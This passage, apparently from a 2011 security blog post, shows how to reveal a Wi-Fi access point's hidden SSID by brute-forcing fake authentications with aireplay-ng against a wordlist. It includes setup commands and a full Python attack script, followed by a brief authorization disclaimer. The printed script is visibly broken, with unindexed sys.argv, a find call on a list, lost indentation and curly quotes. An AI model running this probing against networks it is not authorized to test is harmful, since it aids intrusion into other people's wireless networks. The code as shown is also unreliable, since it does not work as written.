2) a wifi card capable of doing injection (I reccomend an ALFA AWUS036H);
3) a list of well known SSIDs that you can get here or create yourself.What I did was trying to do a fake authentication to the Access Point using the names present in a file that I submit to the script and check if I got authenticated or not.First of all you need to create a monitor interface using airmon-ng and launch airodump-ng to identify the AP with the hidden SSID. Once you have done this write down the channel and the bssid (mac address) of the AP. Destroy the monitor interface and recreate it on the channel the AP you are targeting is working.
The script works by passing the bssid (mac address) you identified previously and the file containing the (E)SSIDs to probe against as parameters
./hidden_ssid <mac_address> <file_name>
The script works trying to do a fake authentication to the AP using all the (E)SSIDs present in the file and checking if it gets correctly authenticated. This is the command line I use to do the test
aireplay-ng –fakeauth 0 -T 1 -a bssid -e essid mon0
the -T 1 option tells aireplay-ng to try only one fake authentication.
The script works assuming that mon0 is the interface to be used but, if needed, it’s trivial to modify this.
Following is the script.
# script created by Tony ‘albatr0ss’ Di Bernardo, October 2011
# you are free to re-use the code as long as you give credit to the author in you works
import sys, binascii, re
from subprocess import Popen, PIPE
if (len(sys.argv) < 3):
print ‘Usage: ‘ + sys.argv + ‘ bssid essid_list’
bssid = sys.argv
essid_list = sys.argv
print ‘Searching name for Access Point ‘ + bssid + ‘ using file ‘ + essid_list
f = open(essid_list, ‘r’)
for temp in f:
essid = re.sub(r’\W+’, ”, temp)
print ‘Trying Essid: ‘ + essid
c = Popen(['aireplay-ng', '--fakeauth', '0', '-T 1','-a', bssid, '-e', essid, 'mon0'], stdout=PIPE)
output = c.stdout.read()
finalresult = output.split(‘\n’)
if finalresult.find(‘Association successful’) != -1 :
print ‘\nFound! Access Point ‘ + bssid + ‘ Essid is ‘ + essid
print ‘\nEssid not in file ‘ + essid_list + ‘ for Access Point ‘ + bssid
You can download it here. You have to decompress it and set the executable flag with
tar xfvz hidden_ssid.tar.gz
chmod +x hidden_ssid.
Be wise and use this only on AP you are previously authorized to do a pentest
3G 802.2 802.3 Android applicativo ARP aruba avvia backtrack audio chiavetta cifrato CSMA/CD data-link datagram Desire DIX DSAP errore Ethernet facebook FCS frame Google hardening hash hosting HowTo HTC https impostazioni Indirizzo MAC IP iweb linux lm MAC modem MTU network pacchetto password sicurezza ssl TCP wifi
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.